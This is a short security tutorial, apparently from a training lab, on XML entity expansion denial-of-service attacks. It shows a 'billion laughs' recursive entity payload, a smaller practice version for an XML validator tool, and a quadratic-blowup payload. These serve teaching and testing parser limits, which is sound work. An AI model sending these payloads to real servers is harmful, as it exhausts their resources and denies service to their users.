XML Entity Expansion


Overview

XML entity expansion attacks recursively include ever exapnding payloads to tie up system resources on the web application server. The attack is a type of Denial of Service (DOS).

YouTubeVideo Tutorials

Discovery Methodology

Attempt to inject self-referencing XML entities that recursively refer to themselves. Be aware of how many levels of expansion are allowed.

Exploitation

The original version of this attack relied on pure recursive expansion. An example is the "billion laughs" attack.
<?xml version="1.0"?> <!DOCTYPE nn [ <!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3;"> ... <!ENTITY ha256 "&ha255; &ha255;"> ]> <nn>&ha256;</nn>
Note that the number of "Ha !" output is roughly 2 ^ 256. That's a lot of laughs; enough to overwhelm a busy servers CPU.

Later versions of XML parsers restrict the number of expansions allowed by setting a low default limit on the number of "levels" of recursion the XML processor will parse before throwing an error. This setting is typically around 4 levels by default.

Example

Try these examples in the XML Validator Tool. The "billion laughs" attack should not work past 4-5 levels. Start with 4 levels as in this example. Increase to 5, etc. and see if the expansion still works.
<?xml version="1.0"?> <!DOCTYPE nn [ <!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3;"> ]> <nn>&ha4;</nn>
A variation is the quadratic expansion. Rather than using pure recursion to expand the amount of data, quadratic expansion uses a very small number of levels but with huge payloads and lots of entities per level. Try this example gradually increasing the length of the data in node "nn" and increases the number of references to mode nn in the "data" node.
<?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY nn "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...."> ]> <data>&nn;&nn;&nn;&nn;&nn;&nn;&nn;&nn;&nn;&nn;&nn;&nn;.....</data>